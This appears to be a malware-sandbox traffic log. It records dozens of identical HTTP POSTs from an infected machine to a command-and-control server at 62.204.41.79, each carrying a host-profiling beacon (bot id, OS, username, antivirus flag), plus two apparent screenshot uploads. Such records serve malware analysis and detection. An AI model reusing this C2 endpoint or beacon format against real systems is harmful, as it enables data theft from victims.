                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
